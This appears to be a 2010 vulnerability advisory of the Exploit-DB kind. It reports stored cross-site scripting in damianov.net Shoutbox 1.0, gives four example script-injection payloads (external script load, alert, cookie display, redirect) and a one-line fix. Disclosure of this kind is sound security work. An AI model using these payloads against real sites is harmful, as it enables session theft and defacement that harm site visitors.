50 lines
No EOL
1.6 KiB
Text
50 lines
No EOL
1.6 KiB
Text
# Exploit Title: damianov.net Shoutbox XSS Vulnerability
|
|
# Date: 13.05.2010
|
|
# Author: Valentin
|
|
# Category: webapps/0day
|
|
# Version: 1.0
|
|
# Tested on: Debian, Apache2, PHP5
|
|
# CVE :
|
|
# Code :
|
|
|
|
|
|
[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|
|
>> General Information
|
|
Advisory/Exploit Title = damianov.net Shoutbox XSS Vulnerability
|
|
Author = Valentin Hoebel
|
|
Contact = valentin@xenuser.org
|
|
|
|
|
|
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|
|
>> Product information
|
|
Name = damianov.net Shoutbox
|
|
Vendor = damianov.net
|
|
Vendor Website = http://www.damianov.net/
|
|
Affected Version(s) = 1.0
|
|
|
|
|
|
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|
|
>> #1 Vulnerability
|
|
Type = XSS
|
|
Injecting arbitrary HTML and Java Script code is possible while adding a new
|
|
shout, no matter if HTML is allowed in the shoutsettings.php or not.
|
|
|
|
#1 Example: <SCRIPT src=some-script.js></SCRIPT>
|
|
#2 Example: <SCRIPT>alert("XSS")</SCRIPT>
|
|
#3 Example: <SCRIPT>alert(document.cookie)</SCRIPT>
|
|
#4 Example: <script>document.location.href="http://www.google.de"</script>
|
|
|
|
|
|
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|
|
>> Additional Information
|
|
Advisory/Exploit Published = 13.05.2010
|
|
Solution = Edit code and add filters.
|
|
|
|
|
|
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|
|
>> Misc
|
|
Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|
|
<3 packetstormsecurity.org!
|
|
|
|
|
|
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::] |